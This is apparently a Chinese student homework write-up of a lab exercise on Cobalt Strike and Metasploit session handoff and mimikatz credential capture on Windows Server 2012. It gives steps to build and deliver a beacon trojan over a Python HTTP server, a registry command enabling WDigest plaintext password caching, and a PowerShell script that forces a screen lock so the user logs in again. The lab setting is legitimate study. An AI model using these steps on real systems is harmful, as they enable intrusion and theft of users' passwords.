渗透第二次作业

cs与msf权限传递,以及mimikatz抓取win2012明文密码

1、准备三台虚拟机:

一台安装有cs的kali,网络模式为nat,

一台Win2012,有两张网卡,一张为NAT模式,一张为仅主机模式,分别对应内外网,

一台win10,网络模式为仅主机模式,模拟我们的内网主机。

2、在kali上面启动我们的cs服务区端

./teamserver ip password

新开一个终端,开启我们的cs客户端

./cobaltsrtike-client.sh

弹出登录界面,输入连接密码进入

3、点击cobaltstrike----listeners----add

新建一个监听者,名字为cs_win2012,添加http hosts为本机IP地址,httpport 为12345

点击payloads---选择windows stagerness payload -----listeners----beacon_x64.exe,这是我们的木马文件

4、进入到我们的kali终端,检查刚才的木马文件有没有生成,然后

python3 -m http.server 9999

5、到我们的win2012的浏览器输入http://192.168.163.164:9999/进行连接,找到我们的beacon_x64.exe,下载并运行

6、返回到我们的kali的csserver,看是否连接成功,右键interect,输入shell ipconfig查看

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,我们可以使用修稿注册表的形式来进行读取

通过修改注册表来让Wdigest Auth保存明文口令:

复制代码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

如需恢复原样,只需将上图REG_DWORD的值1改为0即可。

复制代码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

修改注册表之后,修改了之后需要用户注销或者重新登陆之后才会生效。

使用强制锁屏脚本来实现

把如下代码保存为lock.ps1

复制代码
Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

输入

复制代码
 powershell -file lock.ps1

抓取明文密码

相关推荐
sbjdhjd1 小时前
云安全 | Docker 容器逃逸复盘(三):docker.sock 挂载与 Docker-in-Docker 风险
经验分享·网络安全·docker·云原生·容器·kubernetes·云安全
Dachui_11228 小时前
内网穿透如何限制访问地区?ZeroNews Geo Location 区域访问控制实践
运维·网络安全·内网穿透·访问控制·远程办公·api安全·ip白名单
HackTwoHub8 小时前
DeepSeek Harness 红队破甲插件|适配 SRC 挖掘场景,区分平台拦截与模型原生输出,用于大模型安全边界合规测评研究
安全·web安全·网络安全·系统安全·密码学·网络攻击模型·安全架构
菩提小狗8 小时前
每日安全情报报告 · 2026-10-09
网络安全·漏洞·cve·安全情报·每日安全
白帽攻防录9 小时前
SRC 挖洞:TanStack Start 服务器函数 XSS 深度复盘,CVE-2026-102989 怎么窃取用户会话
运维·服务器·网络安全·xss
中原第一高手9 小时前
fofatoto 1.8.0 发布:启动即知新版本、中文进度面板与更干净的 Web 日志
python·网络安全·开源·资产测绘·fofa
Bruce_Liuxiaowei10 小时前
2026年10月第2周网络安全形势周报
网络安全
黄金龙PLUS1 天前
如何基于置换算法来设计对称加密算法
算法·网络安全·密码学·哈希算法·同态加密
王大傻09281 天前
堆叠注入(Stacked Queries Injection)详解:原理、利用与防御
服务器·网络·数据库·web安全·网络安全
芯盾时代1 天前
从《人工智能安全治理框架3.0》看智能体安全治理
人工智能·安全·网络安全·智能体